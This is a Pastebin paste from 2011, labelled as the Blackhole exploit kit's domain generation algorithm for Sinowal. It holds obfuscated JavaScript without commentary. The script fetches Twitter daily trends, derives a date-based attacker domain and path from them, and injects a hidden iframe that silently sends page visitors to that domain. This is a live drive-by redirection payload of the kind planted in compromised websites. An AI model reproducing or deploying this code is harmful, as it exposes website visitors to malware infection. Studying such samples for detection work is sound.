Guest User

Blackhole exploit kit domain generation algorithm of SInowal

a guest
Jul 14th, 2011
1,307
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  a=5;
  2.  kx_rg=function(x)
  3.  {
  4.    kx_s.kx_t=x;
  5.    var d=new Date();
  6.    d.setTime(kx_D(x));
  7.    var kx_k=d.getUTCHours();
  8.    kx_s.kx_k=kx_k;
  9.    if(kx_k>8)
  10.    {
  11.      d.setUTCDate(d.getUTCDate()-2)
  12.    }
  13.    else
  14.    {
  15.      d.setUTCDate(d.getUTCDate()-3)
  16.    };
  17.    kx_s.kx_E=d;
  18.    var kx_K=[];
  19.    var kx_a="";
  20.    kx_K["kx_g"]=d.getUTCFullYear();
  21.    kx_K["kx_J"]=d.getUTCMonth()+1;
  22.    kx_K["kx_v"]=d.getUTCDate();
  23.    if(d.getUTCMonth()+1<10)
  24.    {
  25.      kx_a=kx_K["kx_g"]+"-0"+(d.getUTCMonth()+1)
  26.    }
  27.    else
  28.    {
  29.      kx_a=kx_K["kx_g"]+"-"+(d.getUTCMonth()+1)
  30.    }
  31.    if(d.getUTCDate()<10)
  32.    {
  33.      kx_a=kx_a+"-0"+d.getUTCDate()
  34.    }
  35.    else
  36.    {
  37.      kx_a=kx_a+"-"+d.getUTCDate()
  38.    }
  39.    setTimeout((function(kx_a)
  40.    {
  41.      return function()
  42.      {
  43.        var kx_P=kx_A('script');
  44.        var kx_m=Math.random().toString();
  45.        kx_P.setAttribute('src',"http://api.twitter.com/1/trends/daily.json?date="+kx_a+"&callback=window.kx_rN&rnd="+kx_m);
  46.        kx_B.appendChild(kx_P)
  47.      }
  48.    }
  49.    )(kx_a),1900)
  50.  };
  51.  window.kx_rg=kx_rg;
  52.  kx_D=function(kx_x)
  53.  {
  54.    return kx_x.as_of*1000
  55.  };
  56.  kx_rN=function(x)
  57.  {
  58.    kx_s.kx_f=x;
  59.    g()
  60.  };
  61.  window.kx_rN=kx_rN;
  62.  g=function()
  63.  {
  64.    var kx_a=0;
  65.    var kx_h=kx_f.trends;
  66.    var kx_rz=kx_s.offset2||23;
  67.    for(var i in kx_h)
  68.    {
  69.      kx_G=function(kx_i)
  70.      {
  71.        return kx_h[i][kx_i].query
  72.      };
  73.      if(kx_k>8&&kx_k<21&&i.indexOf(' 07')>-1)
  74.      {
  75.        kx_a=kx_G(4).charCodeAt(1)+kx_G(4).length;
  76.        break
  77.      }
  78.      else if((kx_k<9||kx_k>20)&&i.indexOf(' 18')>-1)
  79.      {
  80.        kx_a=kx_G(4).charCodeAt(1)+10+kx_G(4).length;
  81.        break
  82.      }
  83.    }
  84.    if(kx_a==0)
  85.    {
  86.      kx_a=kx_h[i][6].query.charCodeAt(1)+7+kx_h[i][6].query.length
  87.    }
  88.    if(kx_a>0)
  89.    {
  90.      var kx_j=new Array();
  91.      kx_j['kx_g']=kx_E.getUTCFullYear();
  92.      kx_j['kx_J']=kx_E.getUTCMonth()+1;
  93.      kx_j['kx_v']=kx_E.getUTCDate();
  94.      var kx_y=new Array('dbs','ytn','vmt','vmr','mlc','oxk','fds','bvf','yus','mcp','ncz','gdw');
  95.      var kx_o=new Array('a','b','c','d','e','f','g','h','j','i','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
  96.      var kx_L=new Array(3,2,1,4,5,6,7,8,9);
  97.      kx_rt=function(kx_S,kx_e,kx_N,kx_d)
  98.      {
  99.        return(((kx_N+(kx_d*kx_S))+(kx_e^kx_S)*kx_d)+kx_S)
  100.      };
  101.      var kx_r,kx_z,kx_q,kx_b,kx_u;
  102.      var kx_rr=kx_s.offset||125;
  103.      kx_u=kx_rt(kx_j['kx_v'],kx_j['kx_J'],kx_j['kx_g'],kx_a)+kx_rr;
  104.      kx_r=kx_o[(((kx_j['kx_g']&0xAA)+kx_u)%63)%26]+kx_o[(((kx_j['kx_g']&0xAA)<<2)+kx_u)%kx_rz];
  105.      kx_z=kx_o[((((kx_j['kx_g']&0x3311)>>3)+kx_u)%10)]+kx_o[((((kx_j['kx_g']&0x3311)>>4)+kx_u)%10)];
  106.      kx_q=kx_o[((kx_j['kx_J']+kx_u)%kx_rz)]+kx_o[((kx_j['kx_J']*kx_u)%kx_rz)];
  107.      kx_b=kx_o[((kx_j['kx_v']*6)%27)];
  108.      kx_R=kx_b=kx_o[((kx_j['kx_v']*kx_u)%24)];
  109.      var kx_rs=[81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48];
  110.      for(var i=0;i<kx_rs.length;i++)
  111.      {
  112.        kx_rs[i]=String.fromCharCode(i+kx_rs[i]+24)
  113.      }
  114.      var r='http://'+kx_b+kx_z+kx_q+kx_r+kx_R+kx_y[kx_j['kx_J']-1]+'.com/'+kx_rs.join('');
  115.      kx_C(kx_T.getElementById('d3'),'<div style="visibility:hidden"><iframe src="'+r+'" width=100 height=80></iframe></div>')
  116.    }
  117.  };
  118.  kx_A=function(kx_c)
  119.  {
  120.    return kx_T.createElement(kx_c)
  121.  };
  122.  kx_C=function(kx_M,kx_p)
  123.  {
  124.    kx_M.innerHTML=kx_p
  125.  };
  126.  kx_rx=function()
  127.  {
  128.    if(!window.iframeLoaded)
  129.    {
  130.      if(document.body==null)
  131.      {
  132.        setTimeout(kx_rx,200)
  133.      }
  134.      else
  135.      {
  136.        window.kx_s=window;
  137.        window.kx_s.iframeLoaded=true;
  138.        window.kx_w=document.body;
  139.        window.kx_T=document;
  140.        var kx_H=kx_A('div');
  141.        kx_C(kx_H,'<div id="d3" style="display:none;visibility:hidden;"></div>');
  142.        kx_w.appendChild(kx_H);
  143.        var kx_n=kx_A('script');
  144.        kx_s.kx_B=kx_T.getElementsByTagName('head')[0];
  145.        var kx_F=Math.random().toString();
  146.        kx_n.setAttribute('src',"http://api.twitter.com/1/trends/daily.json?callback=window.kx_rg&rnd="+kx_F);
  147.        kx_B.appendChild(kx_n)
  148.      }
  149.    }
  150.  };
  151.  window.kx_rx=kx_rx;
  152.  kx_rx()
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×